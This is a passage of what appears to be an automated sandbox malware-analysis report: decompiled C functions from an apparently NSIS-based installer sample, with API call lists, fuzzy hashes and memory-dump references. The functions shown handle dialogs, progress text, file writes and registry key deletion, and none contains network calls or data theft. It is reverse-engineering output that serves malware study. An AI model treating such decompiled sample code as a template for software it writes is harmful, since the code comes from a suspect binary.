                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                          • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                          • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                          • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}














                                                          0x00404f8d
                                                          0x00404f9a
                                                          0x00404fa0
                                                          0x00404fde
                                                          0x00404fde
                                                          0x00404fed
                                                          0x00404ff4
                                                          0x00000000
                                                          0x00404ff6
                                                          0x00404fa2
                                                          0x00404fb1
                                                          0x00404fb9
                                                          0x00404fbc
                                                          0x00404fce
                                                          0x00404fd4
                                                          0x00404fdb
                                                          0x00000000
                                                          0x00404fdb
                                                          0x00000000

                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                          • GetMessagePos.USER32 ref: 00404FA2
                                                          • ScreenToClient.USER32 ref: 00404FBC
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                          • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                          • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                          				short _v132;
                                                          				void* _t11;
                                                          				WCHAR* _t19;
                                                          
                                                          				if(_a8 == 0x110) {
                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                          					_a8 = 0x113;
                                                          				}
                                                          				if(_a8 == 0x113) {
                                                          					_t11 = E00403012();
                                                          					_t19 = L"unpacking data: %d%%";
                                                          					if( *0x42a270 == 0) {
                                                          						_t19 = L"verifying installer: %d%%";
                                                          					}
                                                          					wsprintfW( &_v132, _t19, _t11);
                                                          					SetWindowTextW(_a4,  &_v132);
                                                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                          				}
                                                          				return 0;
                                                          			}






                                                          0x00402fa3
                                                          0x00402fb1
                                                          0x00402fb7
                                                          0x00402fb7
                                                          0x00402fc5
                                                          0x00402fc7
                                                          0x00402fd3
                                                          0x00402fd8
                                                          0x00402fda
                                                          0x00402fda
                                                          0x00402fe5
                                                          0x00402ff5
                                                          0x00403007
                                                          0x00403007
                                                          0x0040300f

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                          • wsprintfW.USER32 ref: 00402FE5
                                                          • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                          • SetDlgItemTextW.USER32 ref: 00403007
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                          • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                          • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                          • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00402950(void* __ebx) {
                                                          				WCHAR* _t26;
                                                          				void* _t29;
                                                          				long _t37;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t54;
                                                          				void* _t56;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t49 = __ebx;
                                                          				_t52 = 0xfffffd66;
                                                          				_t26 = E00402DA6(0xfffffff0);
                                                          				_t55 = _t26;
                                                          				 *(_t61 - 0x40) = _t26;
                                                          				if(E00405FAE(_t26) == 0) {
                                                          					E00402DA6(0xffffffed);
                                                          				}
                                                          				E00406133(_t55);
                                                          				_t29 = E00406158(_t55, 0x40000000, 2);
                                                          				 *(_t61 + 8) = _t29;
                                                          				if(_t29 != 0xffffffff) {
                                                          					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                          					if( *(_t61 - 0x28) != _t49) {
                                                          						_t37 =  *0x42a274;
                                                          						 *(_t61 - 0x44) = _t37;
                                                          						_t54 = GlobalAlloc(0x40, _t37);
                                                          						if(_t54 != _t49) {
                                                          							E004035F8(_t49);
                                                          							E004035E2(_t54,  *(_t61 - 0x44));
                                                          							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                          							 *(_t61 - 0x10) = _t59;
                                                          							if(_t59 != _t49) {
                                                          								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                          								while( *_t59 != _t49) {
                                                          									_t51 =  *_t59;
                                                          									_t60 = _t59 + 8;
                                                          									 *(_t61 - 0x3c) =  *_t59;
                                                          									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                          									_t59 = _t60 +  *(_t61 - 0x3c);
                                                          								}
                                                          								GlobalFree( *(_t61 - 0x10));
                                                          							}
                                                          							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                          							GlobalFree(_t54);
                                                          							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                          						}
                                                          					}
                                                          					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                          					CloseHandle( *(_t61 + 8));
                                                          				}
                                                          				_t56 = 0xfffffff3;
                                                          				if(_t52 < _t49) {
                                                          					_t56 = 0xffffffef;
                                                          					DeleteFileW( *(_t61 - 0x40));
                                                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                          				}
                                                          				_push(_t56);
                                                          				E00401423();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                          				return 0;
                                                          			}













                                                          0x00402950
                                                          0x00402952
                                                          0x00402957
                                                          0x0040295c
                                                          0x0040295f
                                                          0x00402969
                                                          0x0040296d
                                                          0x0040296d
                                                          0x00402973
                                                          0x00402980
                                                          0x00402988
                                                          0x0040298b
                                                          0x00402997
                                                          0x0040299a
                                                          0x004029a0
                                                          0x004029ae
                                                          0x004029b3
                                                          0x004029b7
                                                          0x004029ba
                                                          0x004029c3
                                                          0x004029cf
                                                          0x004029d3
                                                          0x004029d6
                                                          0x004029e0
                                                          0x004029ff
                                                          0x004029e7
                                                          0x004029ec
                                                          0x004029f4
                                                          0x004029f7
                                                          0x004029fc
                                                          0x004029fc
                                                          0x00402a06
                                                          0x00402a06
                                                          0x00402a13
                                                          0x00402a19
                                                          0x00402a1f
                                                          0x00402a1f
                                                          0x004029b7
                                                          0x00402a33
                                                          0x00402a35
                                                          0x00402a35
                                                          0x00402a3f
                                                          0x00402a40
                                                          0x00402a44
                                                          0x00402a48
                                                          0x00402a4e
                                                          0x00402a4e
                                                          0x00402a55
                                                          0x004022f1
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                          • GlobalFree.KERNEL32 ref: 00402A06
                                                          • GlobalFree.KERNEL32 ref: 00402A19
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                          • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                          • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                          • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                          				char _v68;
                                                          				char _v132;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				signed int _t24;
                                                          				void* _t31;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t44;
                                                          				signed int _t46;
                                                          				signed int _t50;
                                                          				signed int _t52;
                                                          				signed int _t53;
                                                          				signed int _t55;
                                                          
                                                          				_t23 = _a16;
                                                          				_t53 = _a12;
                                                          				_t44 = 0xffffffdc;
                                                          				if(_t23 == 0) {
                                                          					_push(0x14);
                                                          					_pop(0);
                                                          					_t24 = _t53;
                                                          					if(_t53 < 0x100000) {
                                                          						_push(0xa);
                                                          						_pop(0);
                                                          						_t44 = 0xffffffdd;
                                                          					}
                                                          					if(_t53 < 0x400) {
                                                          						_t44 = 0xffffffde;
                                                          					}
                                                          					if(_t53 < 0xffff3333) {
                                                          						_t52 = 0x14;
                                                          						asm("cdq");
                                                          						_t24 = 1 / _t52 + _t53;
                                                          					}
                                                          					_t25 = _t24 & 0x00ffffff;
                                                          					_t55 = _t24 >> 0;
                                                          					_t46 = 0xa;
                                                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                          				} else {
                                                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                          					_t50 = 0;
                                                          				}
                                                          				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                          				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                          				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                          				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                          				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                          			}



















                                                          0x00404e7a
                                                          0x00404e7f
                                                          0x00404e87
                                                          0x00404e88
                                                          0x00404e95
                                                          0x00404e9d
                                                          0x00404e9e
                                                          0x00404ea0
                                                          0x00404ea2
                                                          0x00404ea4
                                                          0x00404ea7
                                                          0x00404ea7
                                                          0x00404eae
                                                          0x00404eb4
                                                          0x00404eb4
                                                          0x00404ebb
                                                          0x00404ec2
                                                          0x00404ec5
                                                          0x00404ec8
                                                          0x00404ec8
                                                          0x00404ecc
                                                          0x00404edc
                                                          0x00404ede
                                                          0x00404ee1
                                                          0x00404e8a
                                                          0x00404e8a
                                                          0x00404e91
                                                          0x00404e91
                                                          0x00404ee9
                                                          0x00404ef4
                                                          0x00404f0a
                                                          0x00404f1b
                                                          0x00404f37

                                                          APIs
                                                          • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                          • wsprintfW.USER32 ref: 00404F1B
                                                          • SetDlgItemTextW.USER32 ref: 00404F2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$H7B
                                                          • API String ID: 3540041739-107966168
                                                          • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                          • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                          • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                          • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				short _v536;
                                                          				void* _t27;
                                                          				signed int _t33;
                                                          				intOrPtr* _t35;
                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				signed int _t47;
                                                          
                                                          				_t46 = _a12;
                                                          				_t47 = _t46 & 0x00000300;
                                                          				_t45 = _t46 & 0x00000001;
                                                          				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                          				if(_t27 == 0) {
                                                          					if((_a12 & 0x00000002) == 0) {
                                                          						L3:
                                                          						_push(0x105);
                                                          						_push( &_v536);
                                                          						_push(0);
                                                          						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                          							__eflags = _t45;
                                                          							if(__eflags != 0) {
                                                          								L10:
                                                          								RegCloseKey(_v8);
                                                          								return 0x3eb;
                                                          							}
                                                          							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								break;
                                                          							}
                                                          							_push(0x105);
                                                          							_push( &_v536);
                                                          							_push(_t45);
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						_t35 = E00406A35(3);
                                                          						if(_t35 != 0) {
                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                          						}
                                                          						return RegDeleteKeyW(_a4, _a8);
                                                          					}
                                                          					_v12 = 0;
                                                          					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                          						goto L10;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				return _t27;
                                                          			}












                                                          0x00402eb4
                                                          0x00402ebd
                                                          0x00402ec6
                                                          0x00402ed2
                                                          0x00402edb
                                                          0x00402ee5
                                                          0x00402f0a
                                                          0x00402f10
                                                          0x00402f15
                                                          0x00402f16
                                                          0x00402f46
                                                          0x00402f1f
                                                          0x00402f21
                                                          0x00402f71
                                                          0x00402f74
                                                          0x00000000
                                                          0x00402f7a
                                                          0x00402f30
                                                          0x00402f35
                                                          0x00402f37
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f3f
                                                          0x00402f44
                                                          0x00402f45
                                                          0x00402f45
                                                          0x00402f52
                                                          0x00402f5a
                                                          0x00402f61
                                                          0x00000000
                                                          0x00402f8a
                                                          0x00000000
                                                          0x00402f69
                                                          0x00402ef5
                                                          0x00402f08
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f08
                                                          0x00402f90

                                                          APIs
                                                          • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                          • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                          • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00401D81(void* __ebx, void* __edx) {
                                                          				struct HWND__* _t30;
                                                          				WCHAR* _t38;
                                                          				void* _t48;
                                                          				void* _t53;
                                                          				signed int _t55;
                                                          				signed int _t60;
                                                          				long _t63;
                                                          				void* _t65;
                                                          
                                                          				_t53 = __ebx;
                                                          				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                          				} else {
                                                          					E00402D84(2);
                                                          					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                          				}
                                                          				_t55 =  *(_t65 - 0x24);
                                                          				 *(_t65 + 8) = _t30;
                                                          				_t60 = _t55 & 0x00000004;
                                                          				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                          				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                          				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                          				if((_t55 & 0x00010000) == 0) {
                                                          					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                          				} else {
                                                          					_t38 = E00402DA6(0x11);
                                                          				}
                                                          				 *(_t65 - 0x44) = _t38;
                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                          				asm("sbb esi, esi");
                                                          				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                          				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                          				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                          					DeleteObject(_t48);
                                                          				}
                                                          				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                          					_push(_t63);
                                                          					E004065AF();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401d81
                                                          0x00401d85
                                                          0x00401d9a
                                                          0x00401d87
                                                          0x00401d89
                                                          0x00401d8f
                                                          0x00401d8f
                                                          0x00401da0
                                                          0x00401da3
                                                          0x00401dad
                                                          0x00401db0
                                                          0x00401db8
                                                          0x00401dc9
                                                          0x00401dcc
                                                          0x00401dd7
                                                          0x00401dce
                                                          0x00401dd0
                                                          0x00401dd0
                                                          0x00401ddb
                                                          0x00401de5
                                                          0x00401e0c
                                                          0x00401e1b
                                                          0x00401e29
                                                          0x00401e31
                                                          0x00401e39
                                                          0x00401e39
                                                          0x00401e42
                                                          0x00401e48
                                                          0x00402ba4
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                          • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                          • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                          • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00401E4E(intOrPtr __edx) {
                                                          				void* __edi;
                                                          				int _t9;
                                                          				signed char _t15;
                                                          				struct HFONT__* _t18;
                                                          				intOrPtr _t30;
                                                          				void* _t31;
                                                          				struct HDC__* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t30 = __edx;
                                                          				_t33 = GetDC( *(_t35 - 8));
                                                          				_t9 = E00402D84(2);
                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                          				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                          				ReleaseDC( *(_t35 - 8), _t33);
                                                          				 *0x40ce08 = E00402D84(3);
